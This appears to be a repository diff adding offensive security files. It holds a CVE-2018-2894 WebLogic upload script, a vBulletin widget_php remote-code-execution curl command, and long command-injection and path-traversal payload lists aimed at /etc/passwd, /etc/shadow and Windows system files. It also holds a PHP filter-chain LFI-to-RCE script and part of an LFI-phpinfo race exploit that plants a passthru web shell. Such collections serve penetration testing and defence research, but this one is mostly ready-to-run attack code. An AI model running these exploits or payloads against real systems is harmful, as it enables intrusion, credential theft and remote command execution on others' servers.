command_in = input("Eneter your command here: ")
|
||||
if command_in == "exit" : exit(0)
|
||||
do_post(command_in)
|
|
@ -0,0 +1,128 @@
|
|||
#!/usr/bin/env python
|
||||
# coding:utf-8
|
||||
# Build By LandGrey
|
||||
|
||||
from __future__ import print_function
|
||||
from builtins import str
|
||||
import re
|
||||
import sys
|
||||
import time
|
||||
import argparse
|
||||
import requests
|
||||
import traceback
|
||||
import xml.etree.ElementTree as ET
|
||||
|
||||
|
||||
def get_current_work_path(host):
|
||||
geturl = host + "/ws_utc/resources/setting/options/general"
|
||||
ua = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:49.0) Gecko/20100101 Firefox/49.0'}
|
||||
values = []
|
||||
try:
|
||||
request = requests.get(geturl)
|
||||
if request.status_code == 404:
|
||||
exit("[-] {} don't exists CVE-2018-2894".format(host))
|
||||
elif "Deploying Application".lower() in request.text.lower():
|
||||
print("[*] First Deploying Website Please wait a moment ...")
|
||||
time.sleep(20)
|
||||
request = requests.get(geturl, headers=ua)
|
||||
if "</defaultValue>" in request.content:
|
||||
root = ET.fromstring(request.content)
|
||||
value = root.find("section").find("options")
|
||||
for e in value:
|
||||
for sub in e:
|
||||
if e.tag == "parameter" and sub.tag == "defaultValue":
|
||||
values.append(sub.text)
|
||||
except requests.ConnectionError:
|
||||
exit("[-] Cannot connect url: {}".format(geturl))
|
||||
if values:
|
||||
return values[0]
|
||||
else:
|
||||
print("[-] Cannot get current work path\n")
|
||||
exit(request.content)
|
||||
|
||||
|
||||
def get_new_work_path(host):
|
||||
origin_work_path = get_current_work_path(host)
|
||||
works = "/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css"
|
||||
if "user_projects" in origin_work_path:
|
||||
if "\\" in origin_work_path:
|
||||
works = works.replace("/", "\\")
|
||||
current_work_home = origin_work_path[:origin_work_path.find("user_projects")] + "user_projects\\domains"
|
||||
dir_len = len(current_work_home.split("\\"))
|
||||
domain_name = origin_work_path.split("\\")[dir_len]
|
||||
current_work_home += "\\" + domain_name + works
|
||||
else:
|
||||
current_work_home = origin_work_path[:origin_work_path.find("user_projects")] + "user_projects/domains"
|
||||
dir_len = len(current_work_home.split("/"))
|
||||
domain_name = origin_work_path.split("/")[dir_len]
|
||||
current_work_home += "/" + domain_name + works
|
||||
else:
|
||||
current_work_home = origin_work_path
|
||||
print("[*] cannot handle current work home dir: {}".format(origin_work_path))
|
||||
return current_work_home
|
||||
|
||||
|
||||
def set_new_upload_path(host, path):
|
||||
data = {
|
||||
"setting_id": "general",
|
||||
"BasicConfigOptions.workDir": path,
|
||||
"BasicConfigOptions.proxyHost": "",
|
||||
"BasicConfigOptions.proxyPort": "80"}
|
||||
request = requests.post(host + "/ws_utc/resources/setting/options", data=data, headers=headers)
|
||||
if "successfully" in request.content:
|
||||
return True
|
||||
else:
|
||||
print("[-] Change New Upload Path failed")
|
||||
exit(request.content)
|
||||
|
||||
|
||||
def upload_webshell(host, uri):
|
||||
set_new_upload_path(host, get_new_work_path(host))
|
||||
files = {
|
||||
"ks_edit_mode": "false",
|
||||
"ks_password_front": password,
|
||||
"ks_password_changed": "true",
|
||||
"ks_filename": ("360sglab.jsp", upload_content)
|
||||
}
|
||||
|
||||
request = requests.post(host + uri, files=files)
|
||||
response = request.text
|
||||
match = re.findall("<id>(.*?)</id>", response)
|
||||
if match:
|
||||
tid = match[-1]
|
||||
shell_path = host + "/ws_utc/css/config/keystore/" + str(tid) + "_360sglab.jsp"
|
||||
if upload_content in requests.get(shell_path, headers=headers).content:
|
||||
print("[+] {} exists CVE-2018-2894".format(host))
|
||||
print("[+] Check URL: {} ".format(shell_path))
|
||||
else:
|
||||
print("[-] {} don't exists CVE-2018-2894".format(host))
|
||||
else:
|
||||
print("[-] {} don't exists CVE-2018-2894".format(host))
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
start = time.time()
|
||||
password = "360sglab"
|
||||
url = "/ws_utc/resources/setting/keystore"
|
||||
parser = argparse.ArgumentParser()
|
||||
parser.add_argument("-t", dest='target', default="http://127.0.0.1:7001", type=str,
|
||||
help="target, such as: http://example.com:7001")
|
||||
|
||||
upload_content = "360sglab test"
|
||||
headers = {
|
||||
'Content-Type': 'application/x-www-form-urlencoded',
|
||||
'X-Requested-With': 'XMLHttpRequest', }
|
||||
|
||||
if len(sys.argv) == 1:
|
||||
sys.argv.append('-h')
|
||||
args = parser.parse_args()
|
||||
target = args.target
|
||||
|
||||
target = target.rstrip('/')
|
||||
if "://" not in target:
|
||||
target = "http://" + target
|
||||
try:
|
||||
upload_webshell(target, url)
|
||||
except Exception as e:
|
||||
print("[-] Error: \n")
|
||||
traceback.print_exc()
|
File diff suppressed because one or more lines are too long
File diff suppressed because one or more lines are too long
|
@ -0,0 +1 @@
|
|||
curl https://example.com/index.php\?routestring\=ajax/render/widget_php --connect-timeout 5 --max-time 15 -s -k --data "widgetConfig[code]=echo system('id');exit;"
|
File diff suppressed because one or more lines are too long
|
@ -0,0 +1,83 @@
|
|||
<!--#exec%20cmd="/bin/cat%20/etc/passwd"-->
|
||||
<!--#exec%20cmd="/bin/cat%20/etc/shadow"-->
|
||||
<!--#exec%20cmd="/usr/bin/id;-->
|
||||
<!--#exec%20cmd="/usr/bin/id;-->
|
||||
/index.html|id|
|
||||
";id;"
|
||||
';id;'
|
||||
;id;
|
||||
;id
|
||||
;netstat -a;
|
||||
"|id|"
|
||||
'|id|'
|
||||
|id
|
||||
|/usr/bin/id
|
||||
|id|
|
||||
"|/usr/bin/id|"
|
||||
'|/usr/bin/id|'
|
||||
|/usr/bin/id|
|
||||
"||/usr/bin/id|"
|
||||
'||/usr/bin/id|'
|
||||
||/usr/bin/id|
|
||||
|id;
|
||||
||/usr/bin/id;
|
||||
;id|
|
||||
;|/usr/bin/id|
|
||||
"\n/bin/ls -al\n"
|
||||
'\n/bin/ls -al\n'
|
||||
\n/bin/ls -al\n
|
||||
\n/usr/bin/id\n
|
||||
\nid\n
|
||||
\n/usr/bin/id;
|
||||
\nid;
|
||||
\n/usr/bin/id|
|
||||
\nid|
|
||||
;/usr/bin/id\n
|
||||
;id\n
|
||||
|usr/bin/id\n
|
||||
|nid\n
|
||||
`id`
|
||||
`/usr/bin/id`
|
||||
a);id
|
||||
a;id
|
||||
a);id;
|
||||
a;id;
|
||||
a);id|
|
||||
a;id|
|
||||
a)|id
|
||||
a|id
|
||||
a)|id;
|
||||
a|id
|
||||
|/bin/ls -al
|
||||
a);/usr/bin/id
|
||||
a;/usr/bin/id
|
||||
a);/usr/bin/id;
|
||||
a;/usr/bin/id;
|
||||
a);/usr/bin/id|
|
||||
a;/usr/bin/id|
|
||||
a)|/usr/bin/id
|
||||
a|/usr/bin/id
|
||||
a)|/usr/bin/id;
|
||||
a|/usr/bin/id
|
||||
;system('cat%20/etc/passwd')
|
||||
;system('id')
|
||||
;system('/usr/bin/id')
|
||||
%0Acat%20/etc/passwd
|
||||
%0A/usr/bin/id
|
||||
%0Aid
|
||||
%22%0A/usr/bin/id%0A%22
|
||||
%27%0A/usr/bin/id%0A%27
|
||||
%0A/usr/bin/id%0A
|
||||
%0Aid%0A
|
||||
"& ping -i 30 127.0.0.1 &"
|
||||
'& ping -i 30 127.0.0.1 &'
|
||||
& ping -i 30 127.0.0.1 &
|
||||
& ping -n 30 127.0.0.1 &
|
||||
%0a ping -i 30 127.0.0.1 %0a
|
||||
`ping 127.0.0.1`
|
||||
| id
|
||||
& id
|
||||
; id
|
||||
%0a id %0a
|
||||
`id`
|
||||
$;/usr/bin/id
|
File diff suppressed because one or more lines are too long
File diff suppressed because one or more lines are too long
File diff suppressed because one or more lines are too long
File diff suppressed because one or more lines are too long
File diff suppressed because one or more lines are too long
|
@ -0,0 +1,140 @@
|
|||
\..\WINDOWS\win.ini
|
||||
\..\..\WINDOWS\win.ini
|
||||
\..\..\..\WINDOWS\win.ini
|
||||
\..\..\..\..\WINDOWS\win.ini
|
||||
\..\..\..\..\..\WINDOWS\win.ini
|
||||
\..\..\..\..\..\..\WINDOWS\win.ini
|
||||
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69
|
||||
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69
|
||||
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69
|
||||
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69
|
||||
%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69
|
||||
%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69
|
||||
%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69
|
||||
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39
|
||||
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39
|
||||
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39
|
||||
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39
|
||||
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\
|
||||
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\
|
||||
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\
|
||||
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\
|
||||
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\
|
||||
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\
|
||||
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\
|
||||
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c
|
||||
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c
|
||||
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c
|
||||
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c
|
||||
%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c
|
||||
%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c
|
||||
%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c
|
||||
../../../../../../../../../etc/passwd
|
||||
../../../../../../../../etc/passwd
|
||||
../../../../../../../etc/passwd
|
||||
../../../../../../etc/passwd
|
||||
../../../../../etc/passwd
|
||||
../../../../etc/passwd
|
||||
../../../etc/passwd
|
||||
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
|
||||
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
|
||||
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
|
||||
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
|
||||
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
|
||||
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
|
||||
%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
|
||||
%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
|
||||
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34
|
||||
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34
|
||||
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34
|
||||
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34
|
||||
../../../.htaccess
|
||||
../../.htaccess
|
||||
../.htaccess
|
||||
.htaccess
|
||||
././.htaccess
|
||||
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73
|
||||
%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73
|
||||
%2e%2e%2f%2e%68%74%61%63%63%65%73%73
|
||||
%2e%68%74%61%63%63%65%73%73
|
||||
%2e%2f%2e%2f%2e%68%74%61%63%63%65%73%73
|
||||
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33
|
||||
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33
|
||||
%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33
|
||||
%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33
|
||||
%%32%65%%32%66%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33
|
||||
../../../../../../../../../../../../etc/hosts%00
|
||||
../../../../../../../../../../../../etc/hosts
|
||||
../../boot.ini
|
||||
/../../../../../../../../%2A
|
||||
../../../../../../../../../../../../etc/passwd%00
|
||||
../../../../../../../../../../../../etc/passwd
|
||||
../../../../../../../../../../../../etc/shadow%00
|
||||
../../../../../../../../../../../../etc/shadow
|
||||
/../../../../../../../../../../etc/passwd^^
|
||||
/../../../../../../../../../../etc/shadow^^
|
||||
/../../../../../../../../../../etc/passwd
|
||||
/../../../../../../../../../../etc/shadow
|
||||
/./././././././././././etc/passwd
|
||||
/./././././././././././etc/shadow
|
||||
\..\..\..\..\..\..\..\..\..\..\etc\passwd
|
||||
\..\..\..\..\..\..\..\..\..\..\etc\shadow
|
||||
..\..\..\..\..\..\..\..\..\..\etc\passwd
|
||||
..\..\..\..\..\..\..\..\..\..\etc\shadow
|
||||
/..\../..\../..\../..\../..\../..\../etc/passwd
|
||||
/..\../..\../..\../..\../..\../..\../etc/shadow
|
||||
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
|
||||
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow
|
||||
\..\..\..\..\..\..\..\..\..\..\etc\passwd%00
|
||||
\..\..\..\..\..\..\..\..\..\..\etc\shadow%00
|
||||
..\..\..\..\..\..\..\..\..\..\etc\passwd%00
|
||||
..\..\..\..\..\..\..\..\..\..\etc\shadow%00
|
||||
%0a/bin/cat%20/etc/passwd
|
||||
%0a/bin/cat%20/etc/shadow
|
||||
%00/etc/passwd%00
|
||||
%00/etc/shadow%00
|
||||
%00../../../../../../etc/passwd
|
||||
%00../../../../../../etc/shadow
|
||||
/../../../../../../../../../../../etc/passwd%00.jpg
|
||||
/../../../../../../../../../../../etc/passwd%00.html
|
||||
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd
|
||||
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow
|
||||
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
|
||||
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow
|
||||
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00
|
||||
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00
|
||||
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%
|
||||
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini
|
||||
\\'/bin/cat%20/etc/passwd\\'
|
||||
\\'/bin/cat%20/etc/shadow\\'
|
||||
../../../../../../../../conf/server.xml
|
||||
/../../../../../../../../bin/id|
|
||||
C:/inetpub/wwwroot/global.asa
|
||||
C:\inetpub\wwwroot\global.asa
|
||||
C:/boot.ini
|
||||
C:\boot.ini
|
||||
../../../../../../../../../../../../localstart.asp%00
|
||||
../../../../../../../../../../../../localstart.asp
|
||||
../../../../../../../../../../../../boot.ini%00
|
||||
../../../../../../../../../../../../boot.ini
|
||||
/./././././././././././boot.ini
|
||||
/../../../../../../../../../../../boot.ini%00
|
||||
/../../../../../../../../../../../boot.ini
|
||||
/..\../..\../..\../..\../..\../..\../boot.ini
|
||||
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini
|
||||
\..\..\..\..\..\..\..\..\..\..\boot.ini
|
||||
..\..\..\..\..\..\..\..\..\..\boot.ini%00
|
||||
..\..\..\..\..\..\..\..\..\..\boot.ini
|
||||
/../../../../../../../../../../../boot.ini%00.html
|
||||
/../../../../../../../../../../../boot.ini%00.jpg
|
||||
/.../.../.../.../.../
|
||||
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini
|
||||
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini
|
||||
/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
|
||||
/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
|
||||
/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
|
||||
/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
|
||||
/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd
|
||||
/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd
|
||||
/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd
|
||||
/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd
|
File diff suppressed because it is too large
Load Diff
File diff suppressed because one or more lines are too long
File diff suppressed because one or more lines are too long
File diff suppressed because one or more lines are too long
|
@ -0,0 +1,60 @@
|
|||
import requests
|
||||
|
||||
url = "http://localhost:8000/chall.php"
|
||||
file_to_use = "/etc/passwd"
|
||||
command = "id"
|
||||
|
||||
#<?=`$_GET[0]`;;?>
|
||||
base64_payload = "PD89YCRfR0VUWzBdYDs7Pz4"
|
||||
|
||||
conversions = {
|
||||
'R': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.MAC.UCS2',
|
||||
'B': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.CP1256.UCS2',
|
||||
'C': 'convert.iconv.UTF8.CSISO2022KR',
|
||||
'8': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2',
|
||||
'9': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.ISO6937.JOHAB',
|
||||
'f': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.SHIFTJISX0213',
|
||||
's': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L3.T.61',
|
||||
'z': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.NAPLPS',
|
||||
'U': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.CP1133.IBM932',
|
||||
'P': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.857.SHIFTJISX0213',
|
||||
'V': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.851.BIG5',
|
||||
'0': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.1046.UCS2',
|
||||
'Y': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UCS2',
|
||||
'W': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.851.UTF8|convert.iconv.L7.UCS2',
|
||||
'd': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UJIS|convert.iconv.852.UCS2',
|
||||
'D': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.SJIS.GBK|convert.iconv.L10.UCS2',
|
||||
'7': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.866.UCS2',
|
||||
'4': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.IEC_P271.UCS2'
|
||||
}
|
||||
|
||||
|
||||
# generate some garbage base64
|
||||
filters = "convert.iconv.UTF8.CSISO2022KR|"
|
||||
filters += "convert.base64-encode|"
|
||||
# make sure to get rid of any equal signs in both the string we just generated and the rest of the file
|
||||
filters += "convert.iconv.UTF8.UTF7|"
|
||||
|
||||
|
||||
for c in base64_payload[::-1]:
|
||||
filters += conversions[c] + "|"
|
||||
# decode and reencode to get rid of everything that isn't valid base64
|
||||
filters += "convert.base64-decode|"
|
||||
filters += "convert.base64-encode|"
|
||||
# get rid of equal signs
|
||||
filters += "convert.iconv.UTF8.UTF7|"
|
||||
|
||||
filters += "convert.base64-decode"
|
||||
|
||||
final_payload = f"php://filter/{filters}/resource={file_to_use}"
|
||||
|
||||
with open('payload', 'w') as f:
|
||||
f.write(final_payload)
|
||||
|
||||
r = requests.get(url, params={
|
||||
"0": command,
|
||||
"action": "include",
|
||||
"file": final_payload
|
||||
})
|
||||
|
||||
print(r.text)
|
|
@ -0,0 +1,200 @@
|
|||
#!/usr/bin/python
|
||||
# https://www.insomniasec.com/downloads/publications/LFI%20With%20PHPInfo%20Assistance.pdf
|
||||
# The following line is not required but supposedly optimizes code.
|
||||
# However, this breaks on some Python 2 installations, where the future module version installed is > 0.16. This can be a pain to revert.
|
||||
# from builtins import range
|
||||
from __future__ import print_function
|
||||
import sys
|
||||
import threading
|
||||
import socket
|
||||
|
||||
def setup(host, port):
|
||||
TAG="Security Test"
|
||||
PAYLOAD="""%s\r
|
||||
<?php $c=fopen('/tmp/g','w');fwrite($c,'<?php passthru($_GET["f"]);?>');?>\r""" % TAG
|
||||
REQ1_DATA="""-----------------------------7dbff1ded0714\r
|
||||
Content-Disposition: form-data; name="dummyname"; filename="test.txt"\r
|
||||
Content-Type: text/plain\r
|
||||
\r
|
||||
%s
|
||||
-----------------------------7dbff1ded0714--\r""" % PAYLOAD
|
||||
padding="A" * 5000
|
||||
REQ1="""POST /phpinfo.php?a="""+padding+""" HTTP/1.1\r
|
||||
Cookie: PHPSESSID=q249llvfromc1or39t6tvnun42; othercookie="""+padding+"""\r
|
||||
HTTP_ACCEPT: """ + padding + """\r
|
||||
HTTP_USER_AGENT: """+padding+"""\r
|
||||
HTTP_ACCEPT_LANGUAGE: """+padding+"""\r
|
||||
HTTP_PRAGMA: """+padding+"""\r
|
||||
Content-Type: multipart/form-data; boundary=---------------------------7dbff1ded0714\r
|
||||
Content-Length: %s\r
|
||||
Host: %s\r
|
||||
\r
|
||||
%s""" %(len(REQ1_DATA),host,REQ1_DATA)
|
||||
#modify this to suit the LFI script
|
||||
LFIREQ="""GET /lfi.php?load=%s%%00 HTTP/1.1\r
|
||||
User-Agent: Mozilla/4.0\r
|
||||
Proxy-Connection: Keep-Alive\r
|
||||
Host: %s\r
|
||||
\r
|
||||
\r
|
||||
"""
|
||||
return (REQ1, TAG, LFIREQ)
|
||||
|
||||
def phpInfoLFI(host, port, phpinforeq, offset, lfireq, tag):
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
|
||||
s.connect((host, port))
|
||||
s2.connect((host, port))
|
||||
|
||||
s.send(phpinforeq)
|
||||
d = ""
|
||||
while len(d) < offset:
|
||||
d += s.recv(offset)
|
||||
try:
|
||||
i = d.index("[tmp_name] =>")
|
||||
if i == -1:
|
||||
i = d.index("[tmp_name] =>")
|
||||
fn = d[i+17:i+31]
|
||||
except ValueError:
|
||||
return None
|
||||
|
||||
s2.send(lfireq % (fn, host))
|
||||
d = s2.recv(4096)
|
||||
s.close()
|
||||
s2.close()
|
||||
|
||||
if d.find(tag) != -1:
|
||||
return fn
|
||||
|
||||
counter=0
|
||||
class ThreadWorker(threading.Thread):
|
||||
def __init__(self, e, l, m, *args):
|
||||
threading.Thread.__init__(self)
|
||||
self.event = e
|
||||
self.lock = l
|
||||
self.maxattempts = m
|
||||
self.args = args
|
||||
|
||||
def run(self):
|
||||
global counter
|
||||
while not self.event.is_set():
|
||||
with self.lock:
|
||||
if counter >= self.maxattempts:
|
||||
return
|
||||
counter+=1
|
||||
|
||||
try:
|
||||
x = phpInfoLFI(*self.args)
|
||||
if self.event.is_set():
|
||||
break
|
||||
if x:
|
||||
print("\nGot it! Shell created in /tmp/g")
|
||||
self.event.set()
|
||||
|
||||
except socket.error:
|
||||
return
|
||||
|
||||
|
||||
def getOffset(host, port, phpinforeq):
|
||||
"""Gets offset of tmp_name in the php output"""
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
